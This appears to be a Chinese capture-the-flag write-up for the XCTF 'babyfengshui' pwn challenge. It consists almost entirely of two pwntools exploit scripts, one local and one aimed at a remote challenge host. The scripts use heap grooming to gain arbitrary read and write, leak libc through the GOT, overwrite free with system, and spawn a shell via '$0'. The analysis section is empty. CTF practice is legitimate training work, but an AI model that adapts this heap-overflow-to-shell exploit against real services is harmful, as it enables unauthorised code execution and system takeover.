题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4713&page=2
分析
exp
本地:
from pwn import *
context(arch='i386',os='linux',log_level='debug')
myelf = ELF("./babyfengshui")
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
io = process(myelf.path)
sla = lambda delim,data : (io.sendlineafter(delim, data))
delete = lambda index : (sla("n: ","1"),sla("x: ",str(index)))
show = lambda index : (sla("n: ","2"),sla("x: ",str(index)))
edit = lambda index,len,text : (sla("n: ","3"),sla("x: ",str(index)),sla("h: ",str(len)),sla("t: ",text))
add = lambda size,name,len,text : (sla("n: ","0"),sla("n: ",str(size)),sla("e: ",name),sla("h: ",str(len)),sla("t: ",text))
# heap fengshui
add(0x8,'name0',0x8,'text0')
add(0x8,'name1',0x8,'text1')
delete(0)
add(0x80,'name2',0x8,'text2')
# input system arg $0 to chunk3
add(0x80,'name3',0x8,'$0')
# arbitrary address read
def aar(addr):
edit(2,0x9c,'\x00'*0x98+p32(addr))
show(1);io.recvuntil('description: ')
return u32(io.recv(4))
# lower than heap address write
def aaw(addr,content):
edit(2,0x9c,'\x00'*0x98+p32(addr))
edit(1,len(content),content)
# use aar and aaw to leak libc and hijack got table
libc.address = aar(myelf.got['free'])-libc.symbols['free']
aaw(myelf.got['free'],p32(libc.symbols['system']))
# trigger free(chunk3) to call system($0)
delete(3);io.interactive()
远程:
from pwn import *
context(arch='i386',os='linux',log_level='debug')
myelf = ELF("./babyfengshui")
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
io =remote('111.198.29.45',56768)
sla = lambda delim,data : (io.sendlineafter(delim, data))
delete = lambda index : (sla("n: ","1"),sla("x: ",str(index)))
show = lambda index : (sla("n: ","2"),sla("x: ",str(index)))
edit = lambda index,len,text : (sla("n: ","3"),sla("x: ",str(index)),sla("h: ",str(len)),sla("t: ",text))
add = lambda size,name,len,text : (sla("n: ","0"),sla("n: ",str(size)),sla("e: ",name),sla("h: ",str(len)),sla("t: ",text))
# heap fengshui
add(0x8,'name0',0x8,'text0')
add(0x8,'name1',0x8,'text1')
delete(0)
add(0x80,'name2',0x8,'text2')
# input system arg $0 to chunk3
add(0x80,'name3',0x8,'$0')
# arbitrary address read
def aar(addr):
edit(2,0x9c,'\x00'*0x98+p32(addr))
show(1);io.recvuntil('description: ')
return u32(io.recv(4))
# lower than heap address write
def aaw(addr,content):
edit(2,0x9c,'\x00'*0x98+p32(addr))
edit(1,len(content),content)
# use aar and aaw to leak libc and hijack got table
libc.address = aar(myelf.got['free'])-0x070750
aaw(myelf.got['free'],p32(libc.address+0x03a940))
# trigger free(chunk3) to call system($0)
delete(3);io.interactive()